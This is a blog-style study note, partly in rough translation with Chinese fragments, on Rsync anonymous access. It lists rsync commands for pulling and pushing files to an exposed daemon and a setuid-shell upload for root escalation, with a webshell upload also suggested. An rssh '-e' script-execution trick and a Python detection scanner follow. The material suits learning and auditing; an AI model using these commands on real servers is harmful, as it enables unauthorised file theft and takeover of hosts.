foreword
Two days ago, I summarized the common loopholes in the Internet or IT company's intranet, and then decided to study and understand the loopholes that I haven't learned yet, so I'm going to study them one by one. Today is the first one. It's done this year. Why is it so difficult? Because I am usually busy with work, I don't necessarily have time to study every week. Let me talk about common WEB vulnerabilities and weak password vulnerabilities, which are not included in this study.
Introduction to Rsync
What is Rsync
Rsync (remote synchronize) is a remote data synchronization tool that can quickly synchronize files between multiple hosts via LAN/WAN.
What is Rsync's anonymous access
Anonymous access is very simple, no user name is required, and all information for authentication (including various passwords, public and private keys, biological characteristics, etc.) is not required. In short, it can be accessed directly without any access control.
general hazards
下载:#rsync -avz a.b.c.d::path/file path/filiname
上传:#rsync -avz path/filename a.b.c.d::path/file
Privilege escalation
#chmod a+s shell
#rsync -avz shell a.b.c.d::path/file
*查看shell权限不变,运行后提权到root,也可以尝试上传webshell*
rssh
Also rssh-2.3.3-3 does not properly filter the -e option, which can cause problems.
#rsync -e./script.sh a.b.c.d::/tmp--server ./
Vulnerability verification
- Metaspolit的auxiliary/scanner/rsync/modules_list
- python script
# -*- coding:utf-8 -*-
"""
Rsync匿名访问漏洞(未授权访问漏洞)验证工具
"""
#引入依赖的包和库文件
import os
import sys
import socket
import logging
#全局配置设置
logging.basicConfig(level=logging.INFO,format="%(message)s")
socket.setdefaulttimeout(3)
#全局变量
client = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#全局函数:
def str2Binary(content):
"""将文本流转换成二进制流"""
return content.replace(' ','').replace('\n','').decode('hex')
def rsyncCheck(ip,port):
"""执行端口预检查"""
global client
try:
client.connect((ip,port))
except Exception,reason:
logging.error("[-] 访问失败:%s"%reason)
return False
helloString = "405253594e43443a2033312e300a"
try:
client.send(str2Binary(helloString))
hellodata = client.recv(1024)
except Exception,reason:
logging.error("[-] 通信失败:%s"%reason)
return False
if hellodata.find("@RSYNCD") >= 0:
try:
client.send(str2Binary("0a"))
except Exception,reason:
logging.error("[-] 访问失败:%s"%reason)
return False
while True:
try:
data = client.recv(1024)
except Exception,reason:
logging.error("[-] 通信失败:%s"%reason)
if data == "":
break
else:
if str(data).find("@RSYNCD: EXIT") >= 0:
logging.info("[*] 发现漏洞!")
return True
return False
if __name__ == "__main__":
ip = sys.argv[1]
try:
port = sys.argv[2]
except Exception,reason:
port = 873
logging.error("[-] 端口未输入,按照873默认端口进行")
try:
port = int(port)
except Exception,reason:
logging.error("[-] 端口输入错误,按照873默认端口进行")
port = 873
if not rsyncCheck(ip,port):
logging.info("[+] 测试安全!")